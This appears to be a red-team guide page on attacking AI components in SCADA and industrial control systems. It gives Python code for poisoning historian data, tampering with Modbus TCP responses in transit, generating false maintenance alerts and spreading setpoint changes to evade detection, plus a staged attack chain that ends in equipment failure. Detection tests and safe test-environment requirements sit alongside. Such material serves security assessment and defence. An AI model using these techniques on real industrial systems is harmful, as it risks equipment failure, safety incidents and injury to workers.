SCADA/ICS + AI Attacks
Attacking AI systems integrated with SCADA and industrial control systems: sensor data poisoning, control logic manipulation, HMI AI exploitation, and adversarial attacks on predictive maintenance models.
SCADA (Supervisory Control and Data Acquisition) and ICS (Industrial Control Systems) have been integrating AI capabilities at an accelerating pace. AI is used for predictive maintenance, process optimization, anomaly detection, and increasingly for autonomous control decisions. Each integration point creates a new attack surface where the deterministic, safety-engineered behavior of industrial systems meets the probabilistic, manipulable behavior of AI models.
This page covers attack techniques specific to the SCADA/ICS-AI intersection. The attacks described here target the AI components, not the underlying industrial protocols (Modbus, DNP3, OPC UA) — for traditional ICS protocol attacks, refer to established ICS security resources.
Sensor Data Poisoning
The Sensor-to-AI Pipeline
AI models in SCADA environments consume data from physical sensors — temperature probes, pressure transducers, flow meters, vibration sensors, voltage monitors, and hundreds of other measurement devices. The pipeline from physical measurement to AI input includes multiple points where data can be manipulated:
Physical Process
|
Sensor (analog measurement)
|
Signal Conditioner (amplification, filtering)
|
A/D Converter (digitization)
|
PLC/RTU (local processing, scaling)
|
Historian (time-series storage)
|
Data Pipeline (ETL, normalization)
|
AI Model (inference)
|
Control Decision (output to actuators)
Each stage in this pipeline presents a different poisoning opportunity with different access requirements and detectability levels.
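The varying access requirements and detectability can be summarized in a small lookup table. The ratings below are illustrative assumptions for assessment planning, not measured values, and the helper function is ours:

```python
# Illustrative mapping of pipeline stages to the access an attacker
# needs and how detectable tampering at that stage tends to be.
# Ratings are discussion-level assumptions, not measured values.
PIPELINE_TAMPER_POINTS = {
    "sensor":             {"access": "physical",          "detectability": "low"},
    "signal_conditioner": {"access": "physical",          "detectability": "low"},
    "ad_converter":       {"access": "physical/firmware", "detectability": "low"},
    "plc_rtu":            {"access": "OT network + engineering credentials",
                           "detectability": "medium"},
    "historian":          {"access": "IT/OT boundary",    "detectability": "medium"},
    "data_pipeline":      {"access": "IT network",        "detectability": "high"},
    "ai_model":           {"access": "ML platform",       "detectability": "high"},
}

def stages_reachable_with(access_hint):
    """Return pipeline stages whose access requirement mentions the hint."""
    return [stage for stage, info in PIPELINE_TAMPER_POINTS.items()
            if access_hint in info["access"]]
```

During scoping, a table like this helps decide which poisoning techniques are in reach for a given assumed level of access.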
Poisoning Techniques
Historian-level poisoning:
The historian (a time-series database that stores all sensor readings) is often the most accessible poisoning target. Historians frequently sit on the IT/OT boundary and may have weaker access controls than the PLCs and RTUs they collect data from.
# Demonstrating historian-level data poisoning
# Target: Predictive maintenance model for industrial pump
import random
from datetime import datetime

def poison_historian_data(historian_connection, target_sensor,
                          poison_strategy):
    """
    Inject manipulated readings into the historian to
    affect AI model training or inference.
    WARNING: Test environment only.
    """
    if poison_strategy == "gradual_drift":
        # Slowly shift readings to desensitize the AI
        # to changes that should trigger maintenance alerts
        for hour in range(720):  # 30 days
            original = historian_connection.read_latest(target_sensor)
            drift_amount = 0.001 * hour  # gradual increase
            poisoned_value = original + drift_amount
            historian_connection.inject(
                sensor=target_sensor,
                value=poisoned_value,
                timestamp=datetime.now(),
            )
    elif poison_strategy == "noise_injection":
        # Add noise to sensor readings to reduce AI model
        # confidence in anomaly detection
        for reading in historian_connection.stream(target_sensor):
            noise = random.gauss(0, reading.value * 0.05)
            historian_connection.modify(
                reading_id=reading.id,
                new_value=reading.value + noise,
            )
    elif poison_strategy == "label_flipping":
        # If the historian stores labeled events (e.g., "fault"
        # vs "normal"), flip labels to confuse training
        events = historian_connection.get_labeled_events(target_sensor)
        flip_count = int(len(events) * 0.1)  # flip 10%
        for event in random.sample(events, flip_count):
            new_label = "normal" if event.label == "fault" else "fault"
            historian_connection.update_label(event.id, new_label)

Network-level poisoning:
If the attacker has access to the OT network, they can intercept and modify sensor readings in transit between PLCs/RTUs and the historian or AI platform:
- Man-in-the-middle on Modbus TCP — Modbus has no authentication or encryption; readings can be modified in transit
- OPC UA subscription manipulation — If OPC UA is used, manipulating subscription data requires compromising the OPC UA server or intercepting unencrypted sessions
- DNP3 spoofing — Injecting spoofed DNP3 responses to provide false readings to the master station
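As a sketch of the Modbus case, the in-transit modification step can be as simple as rewriting register values in a Read Holding Registers response. This assumes the attacker already sits in the traffic path (e.g., via ARP spoofing); the frame layout follows the Modbus TCP application protocol, and the function name is ours:

```python
import struct

def tamper_modbus_response(frame: bytes, scale: float) -> bytes:
    """
    Rewrite register values in a Modbus TCP Read Holding Registers
    (function 0x03) response in transit. Modbus TCP has no
    authentication or integrity check, so the modified frame is
    accepted by the master as-is. Test environments only.
    """
    # MBAP header: transaction ID, protocol ID, length, unit ID; then function code
    txid, proto, length, unit, func = struct.unpack(">HHHBB", frame[:8])
    if func != 0x03:  # only touch read-holding-registers responses
        return frame
    byte_count = frame[8]
    regs = list(struct.unpack(f">{byte_count // 2}H", frame[9:9 + byte_count]))
    # Scale each 16-bit register value, clamping to the valid unsigned range
    regs = [min(0xFFFF, int(r * scale)) for r in regs]
    return frame[:9] + struct.pack(f">{len(regs)}H", *regs)
```

Because the header and byte count are preserved, the tampered frame remains protocol-valid; only the payload values change.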
Detecting Sensor Poisoning
Red team assessments should also evaluate the operator's ability to detect sensor data poisoning:
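As a concrete example of the kind of defense these tests probe, a minimal rate-of-change check might look like the following; the limit would come from process engineering data in practice, and the value used here is an illustrative assumption:

```python
def violates_rate_limit(readings, max_delta_per_step):
    """
    Flag consecutive readings whose change exceeds a physically
    plausible per-interval limit. Returns indices of violating steps.
    A real deployment derives limits from process engineering data,
    not a fixed constant.
    """
    return [i for i in range(1, len(readings))
            if abs(readings[i] - readings[i - 1]) > max_delta_per_step]
```

A tank level that jumps 45 units in one sampling interval is flagged, while gradual changes pass.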
# Detection capability assessment
detection_tests = {
    "physics_consistency": {
        "description": "Does the AI cross-reference sensor readings "
                       "against physical laws?",
        "test": "Inject readings that are physically impossible "
                "(e.g., temperature above boiling point in an "
                "unpressurized water system)",
        "expected_defense": "AI flags physically inconsistent readings",
    },
    "cross_sensor_validation": {
        "description": "Does the AI validate readings against "
                       "correlated sensors?",
        "test": "Poison one temperature sensor while leaving "
                "adjacent sensors unmodified",
        "expected_defense": "AI detects disagreement between "
                            "correlated sensors",
    },
    "rate_of_change_limits": {
        "description": "Does the AI enforce physically plausible "
                       "rates of change?",
        "test": "Inject a sudden step change in a sensor that "
                "should only change gradually (e.g., tank level)",
        "expected_defense": "AI flags impossible rate of change",
    },
}

Predictive Maintenance AI Manipulation
Delayed Maintenance Attacks
Predictive maintenance AI monitors equipment health indicators (vibration, temperature, acoustic emissions, oil analysis) and predicts when maintenance is needed. An attacker who manipulates the AI to delay maintenance recommendations can cause equipment failures.
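The baseline-shift mechanism at the heart of this attack can be demonstrated against a toy rolling-baseline detector standing in for a real predictive maintenance model; the window size, margin, and drift rate are illustrative assumptions:

```python
from collections import deque

class RollingBaselineDetector:
    """Alerts when a reading exceeds the recent mean by a fixed margin.
    Stands in for a model that continually re-learns 'normal' from
    recent data."""
    def __init__(self, window=50, margin=5.0):
        self.history = deque(maxlen=window)
        self.margin = margin

    def observe(self, value):
        baseline = (sum(self.history) / len(self.history)
                    if self.history else value)
        alert = value > baseline + self.margin
        self.history.append(value)
        return alert

detector = RollingBaselineDetector()
# Phase 2: gradual drift, each step small enough to avoid an alert
drift_alerts = sum(detector.observe(20.0 + 0.1 * i) for i in range(200))
# Phase 3: a genuine fault reading that should alert, but the shifted
# baseline now masks it
fault_alert = detector.observe(42.0)
```

Against a fresh detector with a baseline near 20, the reading of 42 triggers an alert; after the drift campaign it does not, which is exactly the masking effect described in the attack chain.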
# Predictive maintenance manipulation attack chain
maintenance_attack = {
    "phase_1_baseline": {
        "description": "Observe normal maintenance prediction patterns",
        "duration": "2-4 weeks",
        "objective": "Understand which sensor readings trigger "
                     "maintenance alerts and their thresholds",
    },
    "phase_2_desensitization": {
        "description": "Gradually shift 'normal' readings toward "
                       "fault thresholds to desensitize the model",
        "duration": "4-8 weeks",
        "technique": "Small daily increases in vibration or temperature "
                     "readings that the model incorporates as the "
                     "new normal baseline",
    },
    "phase_3_masking": {
        "description": "When real fault indicators appear, the model "
                       "does not recognize them because its baseline "
                       "has been shifted",
        "outcome": "Equipment continues operating past its safe "
                   "maintenance window",
    },
    "phase_4_failure": {
        "description": "Equipment fails because maintenance was "
                       "not performed when needed",
        "impact": "Unplanned downtime, potential safety incident, "
                  "cascading failures in interconnected systems",
    },
}

False Alert Generation
The inverse attack — generating false maintenance alerts — wastes maintenance resources and erodes operator trust in the AI:
- Alert fatigue: Repeated false alerts cause operators to ignore or disable the AI alerting system
- Resource exhaustion: Maintenance teams are dispatched for unnecessary equipment inspections
- Scheduled downtime manipulation: False alerts that trigger planned maintenance outages at strategically chosen times
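A minimal sketch of false alert generation, assuming the attacker has learned the model's alert threshold during reconnaissance: inject readings just above the threshold so alerts fire while the values still look like ordinary sensor scatter on later inspection:

```python
import random

def craft_false_alert_readings(alert_threshold, count, seed=None):
    """
    Produce readings marginally above an alert threshold. Each value
    is high enough to trigger a maintenance alert but low enough to
    resemble ordinary sensor scatter, feeding alert fatigue.
    Test environments only.
    """
    rng = random.Random(seed)
    # 0.5-2% above threshold: fires the alert, survives a sanity glance
    return [alert_threshold * (1 + rng.uniform(0.005, 0.02))
            for _ in range(count)]
```

Spacing such readings at irregular intervals over weeks is what drives operators to distrust or disable the alerting system.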
HMI AI Overlay Attacks
Manipulating Operator Decision Support
Modern SCADA HMIs (Human-Machine Interfaces) increasingly include AI overlays that assist operators with decision-making — highlighting anomalies, suggesting responses to alarms, and providing predictive status information. These overlays affect how operators perceive and respond to the process state.
Perception manipulation attacks:
| Attack | Description | Operator Impact |
|---|---|---|
| False normality | AI overlay displays "normal" status while underlying readings indicate a fault | Operator trusts AI and does not investigate |
| Alert suppression | AI de-prioritizes or groups critical alerts so operators miss them | Critical alarm buried in noise |
| Suggested action manipulation | AI suggests incorrect response to a genuine alarm | Operator follows AI suggestion, worsening the situation |
| Trend line manipulation | AI-generated trend predictions show stable operation when degradation is occurring | Operator does not anticipate upcoming failure |
# Testing HMI AI overlay for manipulation
def test_hmi_ai_overlay(hmi_system, scenarios):
    """
    Present the HMI AI with scenarios that should trigger
    specific operator alerts and verify correct behavior.
    """
    results = []
    for scenario in scenarios:
        # Inject the scenario sensor readings
        hmi_system.inject_readings(scenario.sensor_data)
        # Capture what the AI overlay presents to the operator
        overlay_output = hmi_system.get_overlay_display()
        # Compare AI presentation against ground truth
        result = {
            "scenario": scenario.name,
            "ground_truth_status": scenario.actual_status,
            "ai_displayed_status": overlay_output.status,
            "correct": overlay_output.status == scenario.actual_status,
            "alerts_shown": overlay_output.active_alerts,
            "expected_alerts": scenario.expected_alerts,
            "alerts_correct": set(overlay_output.active_alerts) ==
                              set(scenario.expected_alerts),
            "suggested_actions": overlay_output.suggested_actions,
            "suggested_actions_safe": all(
                action in scenario.safe_actions
                for action in overlay_output.suggested_actions
            ),
        }
        results.append(result)
    return results

AI-Based Anomaly Detection Evasion
Evading SCADA Anomaly Detection
AI anomaly detection in SCADA environments monitors network traffic, process behavior, and operator actions for indicators of compromise. An attacker who has gained access to the OT network must evade these AI-based detection systems.
Evasion strategies:
- Low-and-slow manipulation. Make changes small enough that each individual change falls within the AI's normal variation threshold. Over time, the cumulative effect is significant but no single change triggers an alert.
- Mimicry attacks. Study the normal communication patterns and process behavior, then craft attacks that mimic normal operations. For example, send control commands at the same rate and with the same patterns as legitimate operator actions.
- Timing-based evasion. Execute attacks during process transitions (startup, shutdown, load changes) when sensor readings are naturally variable and the AI's anomaly thresholds are wider.
- Model confusion. Send a burst of genuinely anomalous but benign traffic to trigger alerts and consume operator attention, then execute the real attack while operators are investigating false leads.
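The low-and-slow strategy reduces to splitting a large change into steps that each stay under an assumed per-step detection threshold; a minimal schedule generator:

```python
def low_and_slow_schedule(current, target, per_step_limit):
    """
    Split a large setpoint change into steps that each stay at or
    below an anomaly detector's assumed per-step threshold. The
    cumulative effect is the full change; no single step exceeds
    the limit.
    """
    if per_step_limit <= 0:
        raise ValueError("per_step_limit must be positive")
    steps = []
    value = current
    direction = 1 if target >= current else -1
    while abs(target - value) > 1e-9:
        step = direction * min(per_step_limit, abs(target - value))
        value += step
        steps.append(round(value, 6))
    return steps
```

For example, a 0.5-unit setpoint change under a 0.2-unit per-step threshold becomes three individually unremarkable steps. The defensive counterpart is cumulative-drift monitoring over long windows, not just per-step thresholds.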
Testing Environment Requirements
Red team testing of SCADA/ICS AI requires specialized test environments:
Hardware-in-the-loop simulation
Use physical PLCs and RTUs connected to process simulators that model the physical behavior of the controlled process. Software-only simulations may not accurately represent the timing and behavior of real industrial equipment.
Network isolation verification
Verify that the test environment has no connectivity to production OT networks. Use physically separate network infrastructure, not just VLANs or firewalls.
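A simple reachability probe can support (but not replace) this verification. The ports below are the well-known defaults for Modbus TCP (502), DNP3 (20000), and OPC UA (4840); target addresses would come from the assessment's actual address plan:

```python
import socket

def probe_isolation(production_hosts, ports=(502, 20000, 4840), timeout=1.0):
    """
    Attempt TCP connections from the test environment to production
    OT hosts on common ICS ports. Any successful connection is an
    isolation failure. This checks reachability only; it does not
    prove isolation at other layers (serial links, shared storage).
    """
    failures = []
    for host in production_hosts:
        for port in ports:
            try:
                with socket.create_connection((host, port), timeout=timeout):
                    failures.append((host, port))
            except OSError:
                pass  # unreachable: the desired outcome
    return failures
```

An empty result is necessary but not sufficient; physically separate infrastructure remains the requirement.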
Safety system testing
Test that safety instrumented systems (SIS) correctly override AI decisions when safety limits are exceeded. The SIS must function independently of the AI — if the AI can disable or influence the SIS, that is a critical finding.
Operator training integration
Include operators in the testing process. Present operators with scenarios where the AI is being manipulated and evaluate whether operators can detect the manipulation through independent observation.
Further Reading
- Critical Infrastructure AI Security Overview — Broader critical infrastructure context
- Power Grid AI — Energy sector AI attacks
- Transportation AI — Transportation sector AI attacks
- AI Incident Response Playbooks — How to respond to AI security incidents